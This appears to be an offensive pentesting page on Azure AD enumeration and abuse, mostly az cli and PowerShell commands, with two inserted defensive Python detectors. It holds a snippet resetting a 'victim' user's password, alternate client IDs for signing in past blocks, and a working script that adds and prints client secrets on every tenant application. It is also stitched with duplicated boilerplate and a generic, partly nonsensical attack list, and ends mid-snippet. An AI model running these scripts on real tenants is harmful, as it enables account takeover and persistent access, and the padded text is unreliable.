Az - AzureAD (AAD)

Basic Information

Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. It is what lets employees sign in and reach resources both inside and outside the organization, covering Microsoft 365, the Azure portal and a large number of other SaaS applications. Azure AD is designed to provide the core identity services: authentication, authorization and user management.

Key Azure AD features include multi-factor authentication and conditional access, together with tight integration with Microsoft's other security services. These features significantly raise the security of user identities and let organizations implement and effectively enforce their access policies. As a core component of Microsoft's cloud ecosystem, Azure AD is essential for cloud-based management of user identities.

Entities

Enumeration

For this enumeration you can use the az cli tool, the AzureAD PowerShell module (or AzureAD Preview) and the Az PowerShell module.

On Linux you will need to install PowerShell Core:

```bash
sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
# Register the Microsoft package repository
sudo dpkg -i packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```

Differences between the modules

  • AzureAD is a Microsoft PowerShell module for managing Azure AD. It does not show every property of Azure AD objects and cannot be used to access information about Azure resources.

  • Az PowerShell is a module for managing Azure resources from the PowerShell command line.

Connection

```bash
az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subcommands
az ad user list --query-examples # Get examples
```

When you log in to Azure via CLI with any program, you are using an Azure Application from a tenant that belongs to Microsoft. These Applications, like the ones you can create in your own account, have a client ID. You will not see all of them in the lists of allowed applications shown in the console, but they are allowed by default.

For example, a PowerShell script that authenticates uses an application with the client ID 1950a258-227b-4e31-a9cf-717495945fc2. Even though the application does not appear in the console, a sysadmin could block it so that users cannot sign in with tools that connect through that Application.

However, there are other application client IDs that will let you connect to Azure:

```powershell
# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
    -ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
    -Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
    -Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
    -Verbose -Debug `
    -InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
    -ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
    -Scope 'openid profile Sites.Read.All User.Read email' `
    -Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
    -Verbose -Debug `
    -InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
    -ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
    -Scope 'openid' `
    -Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
    -Verbose -Debug `
    -InformationAction Continue
```
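As an added example (not from the original page), the Python script below is the check a tenant admin would run over sign-in logs after deciding that the client IDs quoted above are not expected for ordinary users: it flags successful sign-ins through those IDs, keeps an allow list for the accounts that legitimately use them, and counts failed attempts separately. The record shape follows the Microsoft Graph signIn resource; the records, the allow list and the choice of watched IDs are constructed assumptions.

```python
"""Flag sign-ins made through the first-party client IDs quoted on this page.

Added example, not from the original page. Records follow the field names of
the Microsoft Graph signIn resource (appId, appDisplayName, userPrincipalName,
clientAppUsed, ipAddress, status.errorCode); the records, the allow list and
the choice of which IDs are "unexpected" are constructed assumptions.
"""
from collections import Counter

# Client IDs quoted on this page. Treating them as unexpected for ordinary
# users is an assumption of this example; a tenant picks its own list.
WATCHED_CLIENT_IDS = {
    "1950a258-227b-4e31-a9cf-717495945fc2": "Azure PowerShell",
    "1dfb5f98-f363-4b0f-b63a-8d20ada1e62d": "Graph Try-It (staging)",
    "65611c08-af8c-46fc-ad20-1888eb1b70d9": "Chrome extension redirect client",
    "d3ce4cf8-6810-442d-b42e-375e14710095": "Graph Explorer",
}

# Accounts expected to use these tools (constructed).
ALLOWED_USERS = frozenset({"svc-admin@corp.onmicrosoft.com"})

# Constructed sign-in records, not real tenant data.
SAMPLE_SIGNINS = [
    {"userPrincipalName": "alice@corp.onmicrosoft.com",
     "appId": "1950a258-227b-4e31-a9cf-717495945fc2",
     "appDisplayName": "Microsoft Azure PowerShell",
     "clientAppUsed": "Mobile Apps and Desktop clients",
     "ipAddress": "203.0.113.10", "status": {"errorCode": 0}},
    {"userPrincipalName": "bob@corp.onmicrosoft.com",
     "appId": "d3ce4cf8-6810-442d-b42e-375e14710095",
     "appDisplayName": "Graph Explorer", "clientAppUsed": "Browser",
     "ipAddress": "198.51.100.7", "status": {"errorCode": 0}},
    {"userPrincipalName": "alice@corp.onmicrosoft.com",
     "appId": "1dfb5f98-f363-4b0f-b63a-8d20ada1e62d",
     "appDisplayName": "Graph Try-It", "clientAppUsed": "Browser",
     "ipAddress": "203.0.113.10", "status": {"errorCode": 50126}},  # failed logon
    {"userPrincipalName": "carol@corp.onmicrosoft.com",
     "appId": "00000000-0000-4000-8000-0000000000aa",  # constructed, not watched
     "appDisplayName": "Line-of-business app", "clientAppUsed": "Browser",
     "ipAddress": "192.0.2.22", "status": {"errorCode": 0}},
    {"userPrincipalName": "svc-admin@corp.onmicrosoft.com",
     "appId": "1950a258-227b-4e31-a9cf-717495945fc2",
     "appDisplayName": "Microsoft Azure PowerShell",
     "clientAppUsed": "Mobile Apps and Desktop clients",
     "ipAddress": "192.0.2.5", "status": {"errorCode": 0}},
    {"userPrincipalName": "alice@corp.onmicrosoft.com",
     "appId": "d3ce4cf8-6810-442d-b42e-375e14710095",
     "appDisplayName": "Graph Explorer", "clientAppUsed": "Browser",
     "ipAddress": "203.0.113.10", "status": {"errorCode": 0}},
]


def flag_first_party_signins(records, watched=WATCHED_CLIENT_IDS,
                             allowed_users=frozenset()):
    """Return (findings, failures). findings holds one entry per successful
    sign-in through a watched client ID by a user not on the allow list;
    failures counts failed attempts per (user, appId) so they stay visible."""
    findings = []
    failures = Counter()
    for rec in records:
        app_id = rec.get("appId", "")
        if app_id not in watched:
            continue
        upn = rec.get("userPrincipalName", "?")
        error_code = (rec.get("status") or {}).get("errorCode", 0)
        if error_code != 0:
            failures[(upn, app_id)] += 1
            continue
        if upn in allowed_users:
            continue
        findings.append({"user": upn, "appId": app_id, "label": watched[app_id],
                         "client": rec.get("clientAppUsed"),
                         "ip": rec.get("ipAddress")})
    return findings, failures


def summarize(findings):
    """Rank users by number of flagged sign-ins, noisiest first."""
    return Counter(f["user"] for f in findings).most_common()


if __name__ == "__main__":
    hits, fails = flag_first_party_signins(SAMPLE_SIGNINS, allowed_users=ALLOWED_USERS)
    for h in hits:
        print(f"{h['user']} used {h['label']} ({h['appId']}) from {h['ip']} via {h['client']}")
    print("ranking:", summarize(hits))
    print("failed attempts:", dict(fails))
```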

Users

```bash
# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>
```

```powershell
# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the beginning of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }
```

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in Azure AD, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in Azure AD, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in Azure AD, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in Azure AD, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in Azure AD, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in Azure AD, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Replace <DirectoryRoleObjectId> with the actual object ID of the directory role you want to enumerate members for.

```powershell
# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginning of DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
```

Change User Password

```powershell
$password = "ThisIsTheNewPassword.!123" | ConvertTo-SecureString -AsPlainText -Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set-AzureADUserPassword -Password $password -Verbose
```

MFA and Conditional Access Policies

It is highly recommended to enable MFA for every user; however, some companies may not configure it, or may configure it through Conditional Access: the user is only required to use MFA when logging in from a specific location, browser or under some other condition. If such policies are not configured correctly they may be subject to bypasses. Check:

Az - Conditional Access Policies / MFA Bypass

Groups

```bash
# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
```

```powershell
# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzureADGroup -ObjectId <group_id> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All groups that are synced from on-prem (note that security groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }
```

```powershell
# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginning of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <group_display_name>
# Get roles assigned to the group (by its object id)
Get-AzRoleAssignment -ObjectId <group_object_id>
```

Add user to group

Group owners can add new users to the group:

```powershell
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
```

Groups can be dynamic, which basically means that a user who meets certain conditions is added to the group automatically. Of course, if the conditions are based on attributes the user can control, they could abuse this feature to get into other groups. Check how dynamic groups can be abused on the following page:

Az - Dynamic Groups Privesc

Service Principals / Enterprise Applications

Note that what PowerShell terminology calls a Service Principal is called an Enterprise Application in the Azure (web) portal.

```bash
# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad sp list --all --query "[?keyCredentials != null].displayName"
```

```powershell
# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *
```

```powershell
# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>
```

Applications can also be listed by calling the Microsoft Graph REST API directly with a bearer token:

```powershell
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value
```

The owner of a Service Principal can change its password.

List every Enterprise Application and try to add a client secret to each one:

```powershell
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
{
<#
    .SYNOPSIS
        Add client secret to the applications.

    .PARAMETER GraphToken
        Pass the Graph API Token

    .EXAMPLE
        PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

    .LINK
        https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
        https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http
#>

    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$True)]
        [String]
        $GraphToken = $null
    )

    $AppList = $null
    $AppPassword = $null

    # List All the Applications
    $Params = @{
        "URI"     = "https://graph.microsoft.com/v1.0/applications"
        "Method"  = "GET"
        "Headers" = @{
            "Content-Type"  = "application/json"
            "Authorization" = "Bearer $GraphToken"
        }
    }

    try
    {
        $AppList = Invoke-RestMethod @Params -UseBasicParsing
    }
    catch
    {
    }

    # Add Password in the Application
    if($AppList -ne $null)
    {
        [System.Collections.ArrayList]$Details = @()

        foreach($App in $AppList.value)
        {
            $ID = $App.ID
            $psobj = New-Object PSObject

            $Params = @{
                "URI"     = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
                "Method"  = "POST"
                "Headers" = @{
                    "Content-Type"  = "application/json"
                    "Authorization" = "Bearer $GraphToken"
                }
            }

            $Body = @{
                "passwordCredential" = @{
                    "displayName" = "Password"
                }
            }

            try
            {
                $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json)
                Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID
                Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId
                Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName
                Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
                Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText
                $Details.Add($psobj) | Out-Null
            }
            catch
            {
                Write-Output "Failed to add new client secret to '$($App.displayName)' Application."
            }
        }
        if($Details -ne $null)
        {
            Write-Output ""
            Write-Output "Client secret added to : "
            Write-Output $Details | fl *
        }
    }
    else
    {
        Write-Output "Failed to Enumerate the Applications."
    }
}
```
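As an added example (not part of the page or HackTricks), the Python audit below is the defender's counterpart to both the az cli `passwordCredentials` query in the Service Principals section and the routine above: it consumes the JSON returned by `GET https://graph.microsoft.com/v1.0/applications`, flags applications with too many secrets, recently added secrets or the generic "Password" display name, and looks for a burst of additions across many applications within a short window. The listing, the application IDs and the thresholds are constructed assumptions.

```python
"""Audit application password credentials from a Graph /applications listing.

Added example, not from the original page or HackTricks. Input is the JSON
shape of GET https://graph.microsoft.com/v1.0/applications: value[] items with
displayName, appId and passwordCredentials[] (keyId, displayName,
startDateTime, endDateTime). Listing, app IDs and thresholds are constructed.
"""
from datetime import datetime, timedelta, timezone

# Point in time the audit is evaluated against (constructed).
REFERENCE_NOW = datetime(2024, 5, 3, tzinfo=timezone.utc)

# Constructed listing: three apps received a secret named "Password" within
# seconds of each other, which is what a scripted addPassword loop leaves behind.
SAMPLE_APPLICATIONS = {"value": [
    {"displayName": "HR Portal", "appId": "00000000-0000-4000-8000-000000000001",
     "passwordCredentials": [
         {"displayName": "rotation-2023", "keyId": "k0",
          "startDateTime": "2023-11-02T08:00:00Z", "endDateTime": "2025-11-02T08:00:00Z"},
         {"displayName": "Password", "keyId": "k1",
          "startDateTime": "2024-05-01T10:00:12Z", "endDateTime": "2026-05-01T10:00:12Z"}]},
    {"displayName": "Billing API", "appId": "00000000-0000-4000-8000-000000000002",
     "passwordCredentials": [
         {"displayName": "Password", "keyId": "k2",
          "startDateTime": "2024-05-01T10:00:15Z", "endDateTime": "2026-05-01T10:00:15Z"}]},
    {"displayName": "Legacy Connector", "appId": "00000000-0000-4000-8000-000000000003",
     "passwordCredentials": [
         {"displayName": "prod", "keyId": "k3",
          "startDateTime": "2022-01-10T09:00:00Z", "endDateTime": "2024-01-10T09:00:00Z"},
         {"displayName": "prod-renewed", "keyId": "k4",
          "startDateTime": "2023-12-01T09:00:00Z", "endDateTime": "2025-12-01T09:00:00Z"},
         {"displayName": "Password", "keyId": "k5",
          "startDateTime": "2024-05-01T10:00:19Z", "endDateTime": "2026-05-01T10:00:19Z"}]},
    {"displayName": "Marketing Site", "appId": "00000000-0000-4000-8000-000000000004",
     "passwordCredentials": None},  # Graph may return null rather than []
    {"displayName": "Old App", "appId": "00000000-0000-4000-8000-000000000005",
     "passwordCredentials": [
         {"displayName": "deploy-key", "keyId": "k6",
          "startDateTime": "2022-06-01T00:00:00Z", "endDateTime": "2024-06-01T00:00:00Z"}]},
]}


def parse_graph_time(value):
    """Graph emits ISO 8601 with a trailing Z; return a timezone-aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def audit_password_credentials(listing, now, recent_days=7, max_secrets=2,
                               suspicious_names=("Password",)):
    """Return one finding per application whose password credentials look off:
    more secrets than max_secrets, a secret created within recent_days, or a
    secret carrying a generic display name such as the default "Password"."""
    findings = []
    for app in listing.get("value", []):
        creds = app.get("passwordCredentials") or []
        recent = [c for c in creds
                  if now - parse_graph_time(c["startDateTime"]) <= timedelta(days=recent_days)]
        generic = [c for c in creds if c.get("displayName") in suspicious_names]
        reasons = []
        if len(creds) > max_secrets:
            reasons.append(f"{len(creds)} secrets (limit {max_secrets})")
        if recent:
            reasons.append(f"{len(recent)} secret(s) added in the last {recent_days} days")
        if generic:
            reasons.append("generic secret name(s): " + ", ".join(c["keyId"] for c in generic))
        if reasons:
            findings.append({"app": app.get("displayName", "?"),
                             "appId": app.get("appId"), "reasons": reasons})
    return findings


def burst_of_recent_secrets(listing, now, recent_days=7, window_minutes=10):
    """Find the largest set of distinct applications that each received a
    password credential inside one window_minutes span during the recent
    period. Many apps in one short window is the signature of a scripted loop
    over /applications/{id}/addPassword rather than routine secret rotation."""
    events = []
    for app in listing.get("value", []):
        for cred in app.get("passwordCredentials") or []:
            start = parse_graph_time(cred["startDateTime"])
            if now - start <= timedelta(days=recent_days):
                events.append((start, app.get("displayName", "?")))
    events.sort()
    window = timedelta(minutes=window_minutes)
    best = set()
    for i, (t0, _) in enumerate(events):
        apps = {name for t, name in events[i:] if t - t0 <= window}
        if len(apps) > len(best):
            best = apps
    return len(best), best


if __name__ == "__main__":
    for f in audit_password_credentials(SAMPLE_APPLICATIONS, REFERENCE_NOW):
        print(f["app"], "->", "; ".join(f["reasons"]))
    print("burst:", burst_of_recent_secrets(SAMPLE_APPLICATIONS, REFERENCE_NOW))
```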

Roles

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"
```

Azure AD

Enumeration

User Enumeration

To enumerate users in Azure AD, you can use the Graph API or tools like Azure AD Recon or Azure AD User Enumeration.

Using Graph API

You can use the Graph API to list users in Azure AD. Make a GET request to https://graph.microsoft.com/v1.0/users.

Using Azure AD Recon

Azure AD Recon is a tool that can be used to perform user enumeration in Azure AD. It can help identify valid usernames in the directory.

Using Azure AD User Enumeration

Azure AD User Enumeration is another tool that can be used to enumerate users in Azure AD. It can help identify valid usernames and gather information about users in the directory.

Group Enumeration

To enumerate groups in Azure AD, you can use the Graph API or tools like Azure AD Recon or Azure AD Group Enumeration.

Using Graph API

You can use the Graph API to list groups in Azure AD. Make a GET request to https://graph.microsoft.com/v1.0/groups.

Using Azure AD Recon

Azure AD Recon can also be used to enumerate groups in Azure AD. It can help identify existing groups and their members.

Using Azure AD Group Enumeration

Azure AD Group Enumeration is a tool that can be used to enumerate groups in Azure AD. It can help identify existing groups and gather information about group members.

Exploitation

Password Spraying

Password spraying attacks can be performed against Azure AD to attempt to gain access to user accounts by trying a few common passwords against many accounts.

Phishing

Phishing attacks can be used to trick users into revealing their credentials, which can then be used to gain unauthorized access to Azure AD.

Brute Force

Brute force attacks can be used to crack weak passwords by trying many possible combinations until the correct one is found.

Token Impersonation

Token impersonation attacks involve stealing or forging tokens to impersonate a user and gain unauthorized access to resources in Azure AD.

Password Policies Bypass

Some misconfigurations in password policies can be exploited to bypass password requirements and gain unauthorized access to Azure AD resources.

OAuth Token Abuse

OAuth token abuse involves abusing OAuth tokens to gain unauthorized access to resources in Azure AD.

Privilege Escalation

Privilege escalation attacks involve gaining higher levels of access in Azure AD than originally granted, allowing an attacker to perform unauthorized actions.

Account Takeover

Account takeover attacks involve gaining unauthorized access to a user's account in Azure AD, allowing an attacker to impersonate the user and perform actions on their behalf.

Data Exfiltration

Data exfiltration attacks involve stealing sensitive data from Azure AD, such as user information or credentials, and transferring it to an external location.

Federation Trust Exploitation

Federation trust exploitation attacks involve exploiting trust relationships between Azure AD and external identity providers to gain unauthorized access to resources.

Application Impersonation

Application impersonation attacks involve impersonating a legitimate application to gain unauthorized access to resources in Azure AD.

Insider Threats

Insider threats involve malicious actions taken by users with legitimate access to Azure AD, such as stealing data or disrupting services.

Malware Injection

Malware injection attacks involve injecting malicious code into Azure AD to gain unauthorized access or disrupt services.

Data Manipulation

Data manipulation attacks involve altering or deleting data in Azure AD to achieve unauthorized actions or disrupt operations.

Session Hijacking

Session hijacking attacks involve taking over a user's active session in Azure AD to gain unauthorized access to their account.

Cross-Site Scripting (XSS)

Cross-Site Scripting attacks involve injecting malicious scripts into web applications to steal data or perform unauthorized actions in Azure AD.

Remote Code Execution (RCE)

Remote Code Execution attacks involve executing malicious code on Azure AD servers to gain unauthorized access or disrupt services.

DNS Spoofing

DNS spoofing attacks involve redirecting DNS queries to malicious servers to intercept traffic and gain unauthorized access to Azure AD resources.

Man-in-the-Middle (MitM) Attacks

Man-in-the-Middle attacks involve intercepting communication between users and Azure AD to eavesdrop on sensitive information or manipulate data.

Social Engineering

Social engineering attacks involve manipulating users into performing actions or revealing sensitive information that can be used to gain unauthorized access to Azure AD.

```powershell
# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <id> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *
```

Azure AD Enumeration

Enumerate Azure AD Users

To list all users in Azure AD, you can use the following PowerShell command:

Get-AzureADUser

Enumerate Azure AD Groups

To list all groups in Azure AD, you can use the following PowerShell command:

Get-AzureADGroup

Enumerate Azure AD Applications

To list all applications in Azure AD, you can use the following PowerShell command:

Get-AzureADApplication

Enumerate Azure AD Service Principals

To list all service principals in Azure AD, you can use the following PowerShell command:

Get-AzureADServicePrincipal

Enumerate Azure AD Devices

To list all devices in Azure AD, you can use the following PowerShell command:

Get-AzureADDevice

Enumerate Azure AD Domains

To list all domains in Azure AD, you can use the following PowerShell command:

Get-AzureADDomain

Enumerate Azure AD Directory Roles

To list all directory roles in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRole

Enumerate Azure AD Directory Role Members

To list all members of a specific directory role in Azure AD, you can use the following PowerShell command:

Get-AzureADDirectoryRoleMember -ObjectId <DirectoryRoleObjectId>

Replace <DirectoryRoleObjectId> with the actual object ID of the directory role you want to enumerate members for.

# Get role assignments on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>
# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
